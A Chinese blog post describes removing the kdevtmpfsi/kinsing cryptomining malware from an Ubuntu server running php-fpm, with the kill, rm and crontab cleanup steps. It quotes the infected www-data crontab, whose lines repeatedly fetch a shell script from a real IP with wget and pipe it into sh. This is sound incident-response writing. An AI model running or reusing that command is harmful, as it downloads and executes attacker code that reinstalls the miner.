kdevtmpfsi病毒进程cpu占用高解决

2021-08-06 06:58:15   Ubuntu

最近服务器进程总被异常终止,查看资源占用,有个kdevtmpfsi的进程200%cpu占用率,查了一下是个挖矿病毒,记录一下解决方法

find

首先,用top命令看了看,就是这个玩意 ↓

kdevtmpfsi

kill

直接kill是不行的,他还有守护进程,k掉还是会重启的,用它的进程号查一下master进程,这里是10469

systemctl status 10469
CGroup: /system.slice/php7.4-fpm.service
           ├─ 9097 php-fpm: pool www
           ├─ 9098 php-fpm: pool www
           ├─ 9172 php-fpm: pool www
           ├─10469 /tmp/kdevtmpfsi
           ├─29251 /tmp/kinsing
           └─29394 php-fpm: master process

把这些都杀掉

kill -9 29394 29251 10469

/tmp下的文件也删掉

rm -rf /tmp/kdevtmpfsi
rm -rf /tmp/kinsing

crontab

最后,还要看一下定时任务,不要直接看一下crontab -e没事就完了,因为他可能在别的用户下,再看上面的那个图

kdevtmpfsi

user是www-data,我们去/var/spool/cron/crontabs看一下

cd /var/spool/cron/crontabs

ls -al 一下,看到有www-data

-rw------- 1 root     crontab 1259 Aug  6 13:27 root
-rw------- 1 www-data crontab  679 Aug  1 14:30 www-data

看一下这个 www-data

cat www-data
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (- installed on Sun Aug  1 14:30:13 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

全部删掉,或者没有其他本来你自己的任务,就直接删掉文件

rm ./www-data

最后,再检查一下进程,以刚刚还没删除的防定时任务又开启了病毒进程,如果重新开启,再kill一遍就好了。

viencoding.com版权所有,允许转载,但转载请注明出处和原文链接: https://viencoding.com/article/305
欢迎小伙伴们在下方评论区留言 ~ O(∩_∩)O
文章对我有帮助, 点此请博主吃包辣条 ~ O(∩_∩)O

猜你喜欢


评论

There are no comments yet.
未登录

登录后即可发表评论

登录或注册

标签

AdSense Anaconda Android apache API apt Auth AWS B-tree Bandwagon Blog bower brew bytes Caffe Catalina cloudcone Composer conda CoreML CPU crontab CSS csv Cuda cv2 datetime Digitalocean DNS Docker Docker-Compose Eloquent Excel export Flask FTP GET Git GitHub GitLab Gmail GoDaddy Google GTM hash Homebrew Homestead HTML http HTTPS IDEA image imagemagick imagick imgick import InnoDB ios iou iPhone ISO8601 iTerm2 Java JPG Keras Laravel Laravel-Admin lazyload Linux list lnmp load logs Lravel Mac Markdown matplotlib md5 mix MobileNet Mojave mongo MongoDB MySQL Namesilo Nginx Node npm numpy Nvidia Nvidia-Docker onevps OpenCV Openpose openpyxl Outline parse PayPal PHP php-fpm PhpStorm PHP扩展 PIL Pillow pip PNG POST Protobuf PyCharm pyenv pymongo Python Python,人工智能,机器学习,VOC,xml Queue Redis requests RGB Sanctum save selenium SEO Shadowsock Shadowsocks ShadowsocksR simplemde Spring Boot SQLServer ssd SSH SSL证书 SSR str Sublime sudo swap Swift Tensorflow TensorflowLite Terminal Terminator Ubuntu urllib UTC v2ray Valet Validation Validator VienBlog virtualenvs VPN VPS Vultr Web Windows WordPress Xcode xlsx yaml YAPI YUV zip zmq zsh 下载图片 主从同步 云主机 云服务器 人工智能 优化 优惠码 伪原创 作弊与反作弊 免费ss账号 免费提现 切片 前端 加密 协议 博客 友链 双击事件 后台运行 后端 命令 国内镜像源 图标 图片操作 图片转换 域名 多身份认证 大小写转换 姿态检测 安卓模拟器 安装 定时任务 定时执行 密码 密钥 导出导入 小程序码 延迟加载 微信 微信小程序 快捷方式 慢查询 懒加载 提现 搜索引擎 搬瓦工 搭梯子 教程 数据库 数据重复 文件上传 无法登录 日志 日期 时区 时间 时间戳 服务器 机器学习 权限 梯子 模拟浏览器 港版支付宝 漏洞 爬虫 生活服务 用户管理 病毒 登录 目标检测 科学上网 系统升级 索引 组件开发 编辑器 自动付款 自定义组件 英文伪原创 计划任务 计算机视觉 认证 语法 读写分离 远程连接 配置文件 重定向 错误异常 错误提示 队列 阿里云 香港 香港手机号
亲情非友情链接